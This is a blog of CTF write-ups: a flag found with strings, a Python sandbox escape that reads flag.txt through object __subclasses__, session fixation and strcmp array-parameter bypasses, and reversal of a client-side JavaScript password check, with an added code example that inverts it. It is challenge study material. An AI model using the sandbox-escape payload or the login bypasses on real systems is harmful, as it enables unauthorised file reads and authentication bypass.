Monday, 22 September 2014

CSAW CTF 2014 Quals write-up


Team r00t ended up scoring 1250. None of the team members worked for more than half a day, and our team is small, just 3 members. All lazy people :D

Exploitation - 1: bo



This was a simple problem, or else we didn't solve it the way it was meant to be solved.
As usual, as soon as we saw an executable we followed the standard procedure -

First, file type

> file bo

bo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

Second, look for strings -

> strings bo

When we look at the strings... oh wait, is that the flag? Hell yeah :D

Welcome to CSAW CTF!

Time to break out IDA Demo and see what's going on inside me.  :]

flag{exploitation_is_easy!}

Exploitation - 2: pybabbies


nc 54.165.210.171 12345

Connecting to the server on that port, we found a Python console.
Afterwards we opened the source file.

As we played around with the console:
- Found it's Python 3.x
- It does not show any returned value.
  Workaround: just print the return value.
- Any error during execution closes the connection.

Time to analyse the source code. All the cool modules and functions were banned :'(

Checked whether there was already a variable named flag or key etc. holding the flag. Obviously it wasn't that easy. So maybe there is a file such as flag.txt or key.txt where the flag is, and we have to open it.

As I had already read a few blog posts about escaping Python sandboxes, it was easy.

Playing around with a tuple ended with an interesting find -

>>> print(().__class__.__bases__[0].__subclasses__()[40])

<type 'file'>

Now it's obvious: try opening flag.txt, key.txt etc.

>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))

<open file 'flag', mode 'r' at 0x.....>

Wow!!! It worked. Now just go ahead and read the file:

Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())

flag{definitely_not_intro_python}

>>> exit



Thanks for reading through the write-up. If anything is wrong or can be added to this post, please put it in the comments :)


Saturday, 19 July 2014

Volga CTF quals 2014

Team r00t managed only 700 points and secured 80th position.

This was one son of a difficult CTF.

Web100-

If login is successful, you are given a particular PHP session id.
Login was easy: you enter a random name, it gets registered and access is given.

The task was session fixation.

After logging in, in the source we can see help.php.


In the link field, give your link to the page where the session id is assigned,

and refresh the logged-in page.

flag: Easy_task_on_Session_Fixation

Comments are welcomed...
Question solving skill: x7r0n

Web200-

Guess they were using the strcmp function on the password.
Change the password parameter to an array.


Response for the above request: [image]

I don't know whether this is how the challenge was meant to be solved, but this shit worked :D

Comments are welcomed :)

Monday, 30 September 2013

Facebook CTF - ACCESS LEVEL 1 WriteUP

Facebook CTF 2013 - NcN 2013

There were only 3 access levels - web, Android APK, and Linux executable. All were reverse engineering only.

Access Level - 1


Whatever 'key' input is given, you get an alert saying 'Invalid password!'.

Tools -> browser with JavaScript console. I used Google Chrome :p

Analysing the source code we get -
<form action="login.php" method="POST" onsubmit="return encrypt(this);">

So on submit an "encrypt" function is called. Using the browser JavaScript console, let's take a look at the script running behind it.

 function encrypt(form)
 {
   var res;
   res=numerical_value(form.password.value);
   res=res*(3+1+3+3+7);
   res=res>>>6;
   res=res/4;
   res=res^4153;
   if(res!=0)
   {
     alert('Invalid password!');
   }
   else
   {
     alert('Correct password :)');
   }
   form.key.value=numerical_value(form.password.value);
   form.verification.value="yes"+simpleHash(form.password.value);
   return true;
 }

That's it. Our work is simple - just make the condition inside the IF false, which means making the var res equal to 0. So the reverse engineering work starts NOW.

Time to analyse the code and start reversing it.
- Just before the if we have an XOR, so res should be equal to 4153 to make res=0
- res * 4 [ 4153*4 = 16612 ]
- >>> is a right shift, so we have 16612 = X>>>6.
  16612 in binary is 100000011100100
  We have no idea about the lost rightmost 6 bits. Taking them as 0's, let's proceed.
  100000011100100+000000 = 1063168, but it can vary by +0 to +63.
- 1063168/(3+1+3+3+7) = 62539.2941176 ~ 62540.
- Now a weird function, numerical_value

 function numerical_value(str)
 {
   var i,a=0,b;
   for(i=0;i<str.length;++i)
   {
     b=ascii_one(str.charAt(i));
     a+=b*(i+1);
   }
   return a;
 }

Observe one more function, ascii_one:

 function ascii_one(foo)
 {
   foo=foo.charAt(0);
   var i;
   for(i=0;i<256;++i)
   {
     var hex_i=i.toString(16);
     if(hex_i.length==1)
       hex_i="0"+hex_i;
     hex_i="%"+hex_i;
     hex_i=unescape(hex_i);
     if(hex_i==foo)
       break;
   }
   return i; // reconstructed: the copy in the post was cut off here; the loop index at the break is the character code
 }

But here there's no need to analyse it. Just manually brute force the var str to get an approximate value of 62540. I got 62545.
var str="zzaaaaaaaaaaaaaaaaaaaaaaddaaaaaspea";

Start with a random number of a's, then modify here and there with the logic that the starting characters have less weight and the ending characters have the most!

So for me this is the key - "zzaaaaaaaaaaaaaaaaaaaaaaddaaaaaspea". It will vary from person to person.
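The hand reasoning above can be checked exactly rather than approximately. What follows is an added example, not code from the original post or from the challenge: it re-implements the form's check as pure functions and enumerates every numerical_value the check accepts. The names numericalValue, checkValue, passesCheck, acceptedRange and WRITEUP_KEY are mine; the arithmetic is copied from encrypt() above, and ascii_one() is replaced by charCodeAt, which returns the same value for characters below 256. It also explains why 62545 passes although the estimate was 62540: besides the 6 bits dropped by >>>, the ^ operator converts res/4 with ToInt32, so the fraction is discarded too and the accepted range is 62540 to 62554.

```javascript
// Added example (not from the original post): the client-side password check
// of the Facebook CTF form as pure functions, plus an exact inversion of it.

// Same as the page's numerical_value(): position-weighted sum of char codes.
// The page's ascii_one(c) equals c.charCodeAt(0) for characters below 256.
function numericalValue(str) {
  let a = 0;
  for (let i = 0; i < str.length; ++i) {
    a += str.charCodeAt(i) * (i + 1);
  }
  return a;
}

// The arithmetic encrypt() applies to numerical_value(), step by step.
// Two steps lose information: >>> 6 drops the low 6 bits, and ^ converts
// both operands with ToInt32, so the fractional part of res/4 is dropped.
function checkValue(n) {
  let res = n;
  res = res * (3 + 1 + 3 + 3 + 7);
  res = res >>> 6;
  res = res / 4;
  res = res ^ 4153;
  return res === 0;
}

function passesCheck(str) {
  return checkValue(numericalValue(str));
}

// Inversion: res is 0 exactly when floor(n*17 / 64) lies in [4153*4, 4153*4+3],
// so the accepted n form one contiguous range. Enumerate to find its ends.
function acceptedRange(limit = 1000000) {
  let lo = -1;
  let hi = -1;
  for (let n = 0; n <= limit; n++) {
    if (checkValue(n)) {
      if (lo < 0) lo = n;
      hi = n;
    }
  }
  return { lo, hi };
}

// The key the write-up reached by hand: "zz", 22 a's, "dd", 5 a's, "spea".
const WRITEUP_KEY = "zz" + "a".repeat(22) + "dd" + "aaaaa" + "spea";

console.log("accepted numerical_value range:", acceptedRange()); // { lo: 62540, hi: 62554 }
console.log("write-up key value:", numericalValue(WRITEUP_KEY)); // 62545
console.log("write-up key passes:", passesCheck(WRITEUP_KEY));   // true
```

The defensive point is the one the challenge is built on: anything checked only in the browser is checked by code the user owns, so the whole accepted set can be computed from the page source. Only a server-side check counts.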

After submitting the key -

Congrats! you passed the level! Here is the key: 23f8d1cea8d60c5816700892284809a94bd00fe7347645b96a99559749c7b7b8

*** Note: this was easy, because I could solve it without knowing much JavaScript.
-> And a rough screenshot of the manual brute force, so you can get a rough idea -
Please download or open the image for a clear view :D :D

-> Anyone who solved it in a much simpler way, please comment your way of solving the problem.
-> Suggestions/comments are most welcome !!! :)


Thanks for reading through

Happy hacking! Happy coding!!